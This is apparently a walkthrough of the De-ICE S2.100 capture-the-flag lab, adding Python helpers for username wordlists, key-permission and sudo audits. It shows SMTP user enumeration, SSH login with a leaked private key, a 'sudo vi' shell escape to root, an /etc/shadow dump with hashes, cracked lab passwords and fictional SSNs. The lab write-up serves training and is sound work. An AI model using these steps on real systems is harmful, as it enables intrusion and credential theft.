I had never done the S2 LiveCD; honestly I didn’t know it existed until I was looking for the download links for the series 1 set. This is basically a clean, up-to-date walkthrough using Kali. All of the spoilers are in the walkthrough section so as not to ruin the pen testing fun. Have fun and hopefully these are helpful.
De-ICE S2.100
Download Link: https://download.vulnhub.com/deice/De-ICE_S2.100_%28de-ice.net-2.100-1.0%29.iso
Scenario: The scenario for this LiveCD is that you have been given an assignment to test a company’s 192.168.2.xxx network to identify any vulnerabilities or exploits. The systems within this network are not critical systems and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency of previous (or current) staff.
Default IP: 192.168.2.100
Flags:
1. Port scan host and create list of open ports
2. Obtain access to file system
3. Perform post exploitation
4. Rummage about in the file system
5. FINAL FLAG: Find salary and Social Security Information for employees
Spoilers and Walkthrough
Using netdiscover to find the potential addresses I found the .100 and .101 addresses active.
```
root@kali:~# netdiscover

 Currently scanning: 192.168.4.0/16   |   Screen View: Unique Hosts

 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.2.1     00:50:56:c0:00:08      1      60  Unknown vendor
 192.168.2.2     00:50:56:f0:ee:65      1      60  Unknown vendor
 192.168.2.100   00:0c:29:1f:c6:f0      1      60  Unknown vendor
 192.168.2.101   00:0c:29:1f:c6:f0      1      60  Unknown vendor
 192.168.2.254   00:50:56:fe:3a:17      1      60  Unknown vendor
```
I’ll start by creating a Metasploit workspace and doing a port scan of the host. The name for the workspace is terrible, since I didn’t know at the time that I would be differentiating between series 1 and 2, but it works.
```
workspace -a de-ice2-100
workspace de-ice2-100
db_nmap -T5 -p 0-65535 -A 192.168.2.100-101
```
I have had great success in numerous penetration tests with data in FTP, so I will start there. Personally I like to use the FileZilla GUI; I know that goes against everything that makes pen testing fun, so feel free to use the command line. The anonymous user doesn’t get a directory listing or see any files, so let’s dig into the vsftpd service. Searchsploit is the local version of the Exploit-DB database, with the added benefit of not having to click on the CAPTCHA box.
```
root@kali:~# searchsploit vsftp
--------------------------------------------- ----------------------------------
 Exploit Title                               |  Path
                                             | (/usr/share/exploitdb/platforms/)
--------------------------------------------- ----------------------------------
vsftpd 2.0.5 - 'CWD' Authenticated Remote Me | linux/dos/5814.pl
vsftpd 2.3.2 - Denial of Service             | linux/dos/16270.c
vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31819.pl
vsftpd 2.3.4 - Backdoor Command Execution (M | unix/remote/17491.rb
--------------------------------------------- ----------------------------------
```
Nothing specific for that version, and mostly denial-of-service attacks, so for now we can move on. Let’s see what mischief we can get into with the web site. From the website’s directory we can harvest a list of users and email addresses for use later. In a real-world penetration test this would be the start of a well-orchestrated phishing campaign.
| Name | Email |
|---|---|
| Samuel Pickwick | pickwick@herot.net |
| Nathaniel Winkle | winkle@herot.net |
| Augustus Snodgrass | snodgrass@herot.net |
| Tracy Tupman | tupman@herot.net |
| Sam Weller | weller@herot.net |
| Tony Weller | tweller@herot.net |
| Estella Havisham | havisham@herot.net |
| Abel Magwitch | magwitch@herot.net |
| Philip Pirrip | pirrip@herot.net |
| Nicholas Nickleby | nickleby@herot.net |
| Ralph Nickleby | rnickleby@herot.net |
| Newman Noggs | noggs@herot.net |
| Wackford Squeers | squeers@herot.net |
| Thomas Pinch | pinch@herot.net |
| Mark Tapley | tapley@herot.net |
| Sarah Gamp | gamp@herot.net |
| Jacob Marley | marley@herot.net |
| Ebenezer Scrooge | scrooge@herot.net |
| Bob Cratchit | cratchit@herot.net |
| Bill Sikes | sikes@herot.net |
| Jack Dawkins | dawkins@herot.net |
| Noah Claypole | claypole@herot.net |
The .101 website looks like a generic policy site, so let’s dig deeper into both of them. Nikto finds some generic problems with the server but nothing that is immediately exploitable.
```
nikto -h 192.168.2.100
nikto -h 192.168.2.101
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
```
Let’s rummage around in that directory. Nada.
During the Nmap scan we found out that the SMTP server has the VRFY verb enabled allowing us to determine potential user accounts for a brute force attack. The list is fairly simple, last name only, first name only, and first initial last name.
```
Pickwick
Winkle
Snodgrass
Tupman
Weller
Weller
Havisham
Magwitch
Pirrip
Nickleby
Nickleby
Noggs
Squeers
Pinch
Tapley
Gamp
Marley
Scrooge
Cratchit
Sikes
Dawkins
Claypole
Samuel
Nathaniel
Augustus
Tracy
Sam
Tony
Estella
Abel
Philip
Nicholas
Ralph
Newman
Wackford
Thomas
Mark
Sarah
Jacob
Ebenezer
Bob
Bill
Jack
Noah
spickwick
nwinkle
asnodgrass
ttupman
sweller
tweller
ehavisham
amagwitch
ppirrip
nnickleby
rnickleby
nnoggs
wsqueers
tpinch
mtapley
sgamp
jmarley
escrooge
bcratchit
bsikes
jdawkins
nclaypole
```
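Typing those 66 guesses by hand is error-prone, so here is a small generator, added here as an example rather than taken from the walkthrough, that builds the same three patterns from the employee table and writes them in the one-per-line format that smtp_enum's USER_FILE expects. It goes a little beyond the page: duplicates (Weller, Nickleby) are collapsed, and the e-mail local parts are appended, since the site's own addresses (tweller, rnickleby) already show how the company resolves name clashes. The EMPLOYEES subset below is constructed from the table above.

```python
from typing import Callable, Dict, Iterable, List, Tuple

# Constructed sample: a subset of the employee table scraped from the 2.100
# web site, as (name, address). Pass the whole table to get the full list.
EMPLOYEES: List[Tuple[str, str]] = [
    ("Samuel Pickwick", "pickwick@herot.net"),
    ("Sam Weller", "weller@herot.net"),
    ("Tony Weller", "tweller@herot.net"),
    ("Nicholas Nickleby", "nickleby@herot.net"),
    ("Ralph Nickleby", "rnickleby@herot.net"),
    ("Philip Pirrip", "pirrip@herot.net"),
]

# The three account-name conventions the walkthrough tries, in its order.
PATTERNS: Dict[str, Callable[[str, str], str]] = {
    "last": lambda first, last: last,
    "first": lambda first, last: first,
    "initial_last": lambda first, last: first[0] + last,
}


def split_name(full_name: str) -> Tuple[str, str]:
    """Lower-case (first, last); any middle names are ignored."""
    parts = full_name.strip().lower().split()
    if not parts:
        raise ValueError("empty name")
    return parts[0], parts[-1]


def build_wordlist(employees: Iterable[Tuple[str, str]],
                   patterns: Dict[str, Callable[[str, str], str]] = PATTERNS) -> List[str]:
    """Candidate usernames grouped by pattern (as on the page), duplicates removed.

    The e-mail local part of each person is appended as a fourth candidate; on
    this site it never adds anything new, which is itself useful to know.
    """
    employees = list(employees)
    seen, words = set(), []

    def add(word: str) -> None:
        if word and word not in seen:
            seen.add(word)
            words.append(word)

    for pattern in patterns.values():
        for full_name, _email in employees:
            add(pattern(*split_name(full_name)))
    for _full_name, email in employees:
        add(email.split("@", 1)[0].lower())
    return words


def write_wordlist(path: str, words: Iterable[str]) -> None:
    """One candidate per line, the format smtp_enum's USER_FILE reads."""
    with open(path, "w", encoding="ascii") as fh:
        fh.write("\n".join(words) + "\n")


if __name__ == "__main__":
    for word in build_wordlist(EMPLOYEES):
        print(word)
```

Run it with the full 22-row table and redirect the output to s2100users.txt; the ordering matches the hand-made list above, minus the repeated surnames.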
Metasploit has an SMTP enumeration module that we will use.
```
msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/s2100users.txt
USER_FILE => /root/Desktop/s2100users.txt
msf auxiliary(smtp_enum) > set RHOSTS 192.168.2.100
RHOSTS => 192.168.2.100
msf auxiliary(smtp_enum) > run

[*] 192.168.2.100:25 - 192.168.2.100:25 Banner: 220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Wed, 19 Apr 2017 12:00:02 GMT
[+] 192.168.2.100:25 - 192.168.2.100:25 Users found: Havisham, Magwitch, Pirrip
[*] Scanned 1 of 1 hosts (100% complete)
```
We now have three verified usernames to start an attack with (Havisham, Magwitch, Pirrip). The .101 address had a readable ~root directory, so let’s check for those users’ directories. Good news: there aren’t any files visible in these either, but all three exist. What files do we expect to see in a user’s home folder? I made a listing of my own home folder to answer this question; some of the entries are obviously penetration testing tools and can be dropped. Linux hides folders that start with a ., so let’s dump this into a wordlist and get started.
```
root@kali:~# ls -a
.              core         .ICEauthority  .nano              Templates
..             Desktop      .install4j     .oracle_jre_usage  Videos
.bash_history  Documents    .java          Pictures           .w3af
.bashrc        Downloads    .john          .profile           .wget-hsts
.bundle        .faraday     .local         Public
.BurpSuite     .gconf       .mozilla       .rnd
.cache         .gnupg       .msf4          .sqlmap
.config        .halberd     Music          .ssh
```

```
Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                Required  Description
   ----        ---------------                --------  -----------
   DICTIONARY  /root/Desktop/webwordlist.txt  no        Path of word dictionary to use
   PATH        /~root                         yes       The path to identify files
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      192.168.2.101                  yes       The target address range or CIDR identifier
   RPORT       80                             yes       The target port (TCP)
   SSL         false                          no        Negotiate SSL/TLS for outgoing connections
   THREADS     256                            yes       The number of concurrent threads
   VHOST                                      no        HTTP server virtual host

msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.2.101
[*] Found http://192.168.2.101:80/~root/../ 404 (192.168.2.101)
[*] Found http://192.168.2.101:80/~root/./ 404 (192.168.2.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~magwitch
PATH => /~magwitch
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.2.101
[*] Found http://192.168.2.101:80/~magwitch/./ 404 (192.168.2.101)
[*] Found http://192.168.2.101:80/~magwitch/../ 404 (192.168.2.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~havisham
PATH => /~havisham
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.2.101
[*] Found http://192.168.2.101:80/~havisham/../ 404 (192.168.2.101)
[*] Found http://192.168.2.101:80/~havisham/./ 404 (192.168.2.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~pirrip
PATH => /~pirrip
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.2.101
[*] Found http://192.168.2.101:80/~pirrip/../ 404 (192.168.2.101)
[*] Found http://192.168.2.101:80/~pirrip/./ 200 (192.168.2.101)
[*] Found http://192.168.2.101:80/~pirrip/.ssh/ 404 (192.168.2.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
The /~pirrip/.ssh/ line doesn’t show up for the other three users, yet it comes back with a 404, which is odd; also the /./ entry is a 200 code instead of a 404. Let’s take a closer look.
That sure looks like it exists. Let’s take a quick detour into SSH to explain why this is important. SSH allows password-based authentication, as we saw in the De-ICE series 1 LiveCDs, but it can also use public-key authentication, which relies on a generated public/private key pair. Having the id_rsa (private key) file is almost as good as having the password in cleartext. Copy those two files to your local .ssh folder and set 600 permissions on id_rsa: ssh refuses to use a private key that other users can read, so doing it up front saves the step of getting the error message, looking up the fix, and trying again.
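The same permission rule is the check a sysadmin wants to run on the other side of the table. The script below is an added example, not something from the walkthrough or the De-ICE image: it walks a directory tree and reports every private key that anyone but its owner can read, recognising keys by their header rather than their file name so that a copy dropped into a web root (as on this box) is caught too. make_fixture builds a constructed test tree in a temporary directory; nothing real is touched.

```python
import os
import stat
import tempfile
from typing import List, Tuple

# Any group/other bit set on a private key makes ssh reject it
# ("UNPROTECTED PRIVATE KEY FILE") and, more to the point, lets every other
# local user (or a web server) hand the key out.
GROUP_OTHER_BITS = 0o077


def is_private_key(path: str) -> bool:
    """True if the first line carries a PEM/OpenSSH private-key header."""
    try:
        with open(path, "rb") as fh:
            return b"PRIVATE KEY" in fh.readline()
    except OSError:
        return False


def find_loose_keys(root: str) -> List[Tuple[str, str]]:
    """Return (path, octal mode) for every private key under root that anyone
    but its owner can read. Detection is by content, not by name, so a key
    copied into a web root or a backup directory is still reported."""
    loose = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or name.endswith(".pub"):
                continue
            if not is_private_key(path):
                continue
            mode = stat.S_IMODE(os.stat(path).st_mode)
            if mode & GROUP_OTHER_BITS:
                loose.append((path, format(mode, "o")))
    return loose


def protect_key(path: str) -> None:
    """The fix: owner read/write only, which is what ssh insists on."""
    os.chmod(path, 0o600)


def make_fixture() -> str:
    """Constructed test tree: one key at 600 in a user's .ssh directory and a
    copy of it left world-readable under a web root (the situation on 2.101)."""
    root = tempfile.mkdtemp(prefix="keyaudit-")
    ssh_dir = os.path.join(root, "home", "pirrip", ".ssh")
    www_dir = os.path.join(root, "www", "101", "home", "pirrip")
    os.makedirs(ssh_dir)
    os.makedirs(www_dir)
    fake_key = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
                b"constructed, not a real key\n"
                b"-----END OPENSSH PRIVATE KEY-----\n")
    for directory, mode in ((ssh_dir, 0o600), (www_dir, 0o644)):
        key_path = os.path.join(directory, "id_rsa")
        with open(key_path, "wb") as fh:
            fh.write(fake_key)
        os.chmod(key_path, mode)
    with open(os.path.join(ssh_dir, "id_rsa.pub"), "wb") as fh:
        fh.write(b"ssh-rsa AAAA constructed\n")
    return root


if __name__ == "__main__":
    import sys
    # With no argument, audit the constructed fixture; otherwise the given tree.
    target = sys.argv[1] if len(sys.argv) > 1 else make_fixture()
    for key_path, key_mode in find_loose_keys(target):
        print(f"{key_mode} {key_path}")
```

Point it at /home and at the document roots of any web server on the box; a 644 id_rsa under a web root is exactly the finding that opened this machine up.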
```
root@kali:~/Desktop# ssh -i id_rsa pirrip@192.168.2.100
The authenticity of host '192.168.2.100 (192.168.2.100)' can't be established.
RSA key fingerprint is SHA256:Z26/6SkV1lodQR++6+78wD4acFpG2KigCTuwo04+Xlw.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.2.100' (RSA) to the list of known hosts.
Linux 2.6.16.
pirrip@slax:~$ id
uid=1000(pirrip) gid=10(wheel) groups=10(wheel)
pirrip@slax:~$ su -
Password: ****
Sorry.
```
We don’t know the password, so even being a member of the wheel group doesn’t help much. There isn’t much to work with in the file system either. In a normal penetration test you could use this system to pivot into others or upload a netcat or Meterpreter shell. In this case, since this is the only system in scope, let’s look at other potential data sources. We know this is a mail server, so:
```
pirrip@slax:~$ mail
mailx version nail 11.25 7/29/05.  Type ? for help.
"/var/mail/pirrip": 7 messages 7 new
>N  1 Abel Magwitch      Sun Jan 13 23:53   20/748   Estella
 N  2 Estella Havisham   Sun Jan 13 23:53   20/780   welcome to the team
 N  3 Abel Magwitch      Sun Jan 13 23:53   20/875   havisham
 N  4 Estella Havisham   Mon Jan 14 00:05   20/861   next month
 N  5 Abel Magwitch      Mon Jan 14 00:05   20/868   vacation
 N  6 Abel Magwitch      Mon Jan 14 00:05   20/915   vacation
 N  7 noreply@fermion.he Mon Jan 14 00:05   29/983   Fermion Account Login Rem
?
Message  1:
From magwitch@slax.example.net Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:47:48 +0000
To: pirrip@slax.example.net
Subject: Estella
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Will do.

?
Message  2:
From havisham@slax.example.net Sun Jan 13 23:53:37 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Sun, 13 Jan 2008 23:50:33 +0000
To: pirrip@slax.example.net
Subject: welcome to the team
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Thanks! Glad to be here.

?
Message  3:
From magwitch@slax.example.net Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:48:57 +0000
To: pirrip@slax.example.net
Subject: havisham
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

I set her up with an accountus servers. I set her password to "changeme" and
will swing by tomorrow and make sure she changes her pw.

?
Message  4:
From havisham@slax.example.net Mon Jan 14 00:05:15 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Mon, 14 Jan 2008 00:03:56 +0000
To: pirrip@slax.example.net
Subject: next month
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Abel filled me in about next month. I wanted to ask you if I can grab the week
you get back for vacation? Thanks.

?
Message  5:
From magwitch@slax.example.net Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:55:41 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Hey, I'll be taking vacation the second week of next month. Have any additional
tasks that need to be taen care of in advance?

?
Message  6:
From magwitch@slax.example.net Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:58:28 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Sure - so far, she's doing just fine. I have assigned her a couple web issues
and the ftp installation for 2.100. She seems to be very comfortable, even with
the new stuff.

?
Message  7:
From noreply@fermion.herot.net Mon Jan 14 00:05:15 2008
Return-Path: <noreply@fermion.herot.net>
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials. Please let us know if
you have any questions or problems.

Regards,
Fermion Support

E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st
```
From the email exchange we have two potential sets of credentials: havisham:changeme and pirrip:0l1v3rTw1st. Let’s try to get elevated privileges with the pirrip password first, since we are already logged in.
```
pirrip@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User pirrip may run the following commands on this host:
    (root) /usr/bin/more
    (root) /usr/bin/tail
    (root) /usr/bin/vi
    (root) /usr/bin/cat ALL
```
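Before trying any of them, it is worth knowing which entries in a listing like that are effectively root. The checker below is an added example, not part of the walkthrough: it parses sudo -l output, handling the (runas) field, optional tags such as NOPASSWD:, and comma-separated command lists, and flags entries that are ALL or that name an editor or pager with a shell escape. SUDO_L_OUTPUT is a constructed reproduction of the four commands above, and the set of escape-capable binaries is a hand-picked list rather than an exhaustive one. On the defensive side, the fix is to keep interactive editors and pagers out of sudoers altogether (sudoedit covers the "edit a root-owned file" case without granting a shell).

```python
import os
import re
from typing import List, NamedTuple, Tuple

# Binaries that offer a shell escape once running as root: vi/vim/view/ex
# and ed via ":!cmd" or "!cmd", more and less via "!cmd". Granting any of
# these under sudo is equivalent to granting ALL.
SHELL_ESCAPE_BINARIES = {"vi", "vim", "view", "ex", "ed", "more", "less"}


class SudoRule(NamedTuple):
    runas: str
    tags: Tuple[str, ...]
    command: str


# One "(runas) [TAG: ...] command[, command ...]" line of `sudo -l` output.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<rest>\S.*?)\s*$")
TAG_RE = re.compile(r"^([A-Z]+):\s*")


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Extract rule lines from `sudo -l` output; the lecture, the password
    prompt and the 'User X may run...' header do not match and are skipped."""
    rules: List[SudoRule] = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        rest, tags = m.group("rest"), []
        t = TAG_RE.match(rest)
        while t:                      # NOPASSWD:, SETENV:, ... may be stacked
            tags.append(t.group(1))
            rest = rest[t.end():]
            t = TAG_RE.match(rest)
        for command in rest.split(","):
            command = command.strip()
            if command:
                rules.append(SudoRule(m.group("runas"), tuple(tags), command))
    return rules


def shell_escape_risks(rules: List[SudoRule]) -> List[SudoRule]:
    """Rules that hand out a root shell: ALL, or a binary with a shell escape."""
    risky = []
    for rule in rules:
        binary = os.path.basename(rule.command.split()[0])
        if rule.command == "ALL" or binary in SHELL_ESCAPE_BINARIES:
            risky.append(rule)
    return risky


# Constructed input reproducing the walkthrough's listing.
SUDO_L_OUTPUT = """\
Password:
User pirrip may run the following commands on this host:
    (root) /usr/bin/more
    (root) /usr/bin/tail
    (root) /usr/bin/vi
    (root) /usr/bin/cat
"""

if __name__ == "__main__":
    for rule in shell_escape_risks(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"({rule.runas}) {rule.command}: shell escape, treat as ALL")
```

Fed the listing above, it reports more and vi; tail and cat read files but cannot spawn a shell, which is a different (still serious, given /etc/shadow) class of exposure.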
vi can be used to get a shell; I learned this in a long, drawn-out penetration test where I got a similar restricted shell through the Shellshock vulnerability. In vi the :! command instructs vi to execute a shell command, so let’s try it.
```
pirrip@slax:~$ sudo vi
:!/bin/sh
sh-3.1# cat /etc/shadow
root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
:q
```
Use :q to exit vi. Feed the password hashes to John or Hashcat and let it cook! Time passes, seasons change. The wedding dress becomes torn and the feast rots on the table, I had to read Charles Dickens in college.
| User | Password |
|---|---|
| root | P1ckw1ckP@p3rs |
| havisham | changeme |
| pirrip | 0l1v3rTw1st |
| magwitch | |
```
pirrip@slax:~$ su -
Password: **************
root@slax:~# ls -a
./   .ICEauthority  .Xresources  .fluxbox/       .fonts.conf  .joerc  .kderc   .mc/       .qt/    Desktop/
../  .Xauthority    .config/     .fonts.cache-1  .icons@      .kde/   .local/  .mplayer/  .save/  Set\ IP\ address
root@slax:~# cd .save
root@slax:~/.save# ls -a
./  ../  great_expectations.zip*
```
We found the file but how do we get it over to our system to check it out? There are a few possible options.
- Build a netcat listener and pipe the file over.
- Move the file to the FTP root and copy it across.
- Move it to the ~root directory and download it from the website.
Netcat is installed on the server and this is an option, but I am lazy, so I ran the following commands to copy the file to the website and give read permissions to everyone:
```
/home/root/.save# cp great_expectations.zip /www/101/home/root/
/home/root/.save# chmod 744 /www/101/home/root/great_expectations.zip
```
After copying it to the local system unzip the archive and untar the file from the zip.
```
unzip great_expectations.zip
tar -xzf great_expectations.tar
```
The greatest piece of advice that I have received on Linux is how to remember the tar switches: say the following in a thick, cartoonish German accent, ‘Extract Zee Files’. tar -xzf. Will this sound dumb when you do it? Yes. Will you remember it without looking at help? Yes.
The Charles_Dickens_3.jpg and Great_Expectations.pdf are pretty self-explanatory. Let’s look at the Jan08 file with cat.
```
root@kali:~/Desktop/s2-100/great_expectations# cat Jan08
From sikes@slax.example.net Sun Jan 13 23:53:37 2008
Return-Path: <sikes@slax.example.net>
Received: from slax.example.net (localhost [127.0.0.1])
        by slax.example.net (8.13.7/8.13.7) with ESMTP id m0DNlmHb009636
        for <pirrip@slax.example.net>; Sun, 13 Jan 2008 23:47:48 GMT
Received: (from sikes@slax.example.net)
        by slax.example.net (8.13.7/8.13.7/Submit) id m0DNlmDI009635
        for pirrip; Sun, 13 Jan 2008 23:47:48 GMT
From: Bill Sikes <sikes@slax.example.net>
Message-Id: <200801132347.m0DNlmDI009635@slax.example.net>
Date: Sun, 13 Jan 2008 23:47:48 +0000
To: pirrip@slax.example.net
Subject: Raises
User-Agent: nail 11.25 7/29/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Here's the data for raises for your team:

Philip Pirrip:    734-67-0424  5.5%  $74,224
Abel Magwitch:    816-03-0028  4.0%  $53,122
Estella Havisham: 762-93-1073  12%   $84,325
```
That is the data we were looking for. But what about that other .jpg file that won’t show a preview? It won’t open in image software; maybe they are trying to obfuscate the file type by changing the extension? Use the file command in Linux to analyze the type.
```
file 363px-Charles_dickensyoung.jpg
363px-Charles_dickensyoung.jpg: POSIX tar archive (GNU)
```
That’s not a JPG at all! Let’s rename the file and take a look inside. Maybe that Jan08 file was a decoy. Nope, it was just a second copy of the original archive, but now you know how to use the file command. This was the best of times and the worst of times. I hope that you learned at least one thing that you will be able to put into practice in the future.
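To show what file is actually doing there, here is a stripped-down version of it, added as an example and not taken from the walkthrough: it matches a handful of well-known signatures, including the ustar field at byte 257 that identifies a tar archive, and reports when a file's extension claims one type while its content is another. fake_tar_header builds a constructed 512-byte header so the block runs without the archive from the image; the signature table covers only a few formats, unlike libmagic's.

```python
import os
from typing import List, Optional, Tuple

# (offset, magic, description): a few of the signatures file(1) also knows.
# The tar check is the "ustar" field at byte 257 of the first header block,
# which is why 512 bytes are read rather than just the first few.
SIGNATURES: List[Tuple[int, bytes, str]] = [
    (0, b"\xff\xd8\xff", "JPEG image data"),
    (0, b"\x89PNG\r\n\x1a\n", "PNG image data"),
    (0, b"PK\x03\x04", "Zip archive data"),
    (0, b"\x1f\x8b", "gzip compressed data"),
    (0, b"%PDF-", "PDF document"),
    (257, b"ustar", "POSIX tar archive"),
]

# What each extension claims to be, for the mismatch check.
EXTENSION_CLAIMS = {
    ".jpg": "JPEG image data", ".jpeg": "JPEG image data",
    ".png": "PNG image data", ".zip": "Zip archive data",
    ".gz": "gzip compressed data", ".tgz": "gzip compressed data",
    ".pdf": "PDF document", ".tar": "POSIX tar archive",
}


def identify_bytes(head: bytes) -> str:
    """Describe content from its leading bytes; 'data' if nothing matches."""
    for offset, magic, description in SIGNATURES:
        if head[offset:offset + len(magic)] == magic:
            return description
    return "data"


def identify_file(path: str) -> str:
    with open(path, "rb") as fh:
        return identify_bytes(fh.read(512))


def extension_mismatch(name: str, head: bytes) -> Optional[Tuple[str, str]]:
    """(claimed, actual) when the extension and the content disagree, else None.
    Unknown extensions and unidentified content are not reported."""
    claimed = EXTENSION_CLAIMS.get(os.path.splitext(name)[1].lower())
    actual = identify_bytes(head)
    if claimed is None or actual == "data" or claimed == actual:
        return None
    return claimed, actual


def fake_tar_header(member_name: str = "great_expectations.zip") -> bytes:
    """Constructed 512-byte ustar header block: name field at 0, magic at 257.
    Enough to exercise the tar signature; not a valid archive."""
    block = bytearray(512)
    block[0:len(member_name)] = member_name.encode()
    block[257:262] = b"ustar"
    return bytes(block)


if __name__ == "__main__":
    # Constructed samples mirroring the two .jpg files from the archive.
    samples = {
        "363px-Charles_dickensyoung.jpg": fake_tar_header(),
        "Charles_Dickens_3.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 508,
    }
    for name, head in samples.items():
        print(name, "->", identify_bytes(head), extension_mismatch(name, head) or "ok")
```

Run over an extracted archive with identify_file, the mismatch check is the same trick in the other direction: a quick triage rule for files whose extension does not match what is inside them.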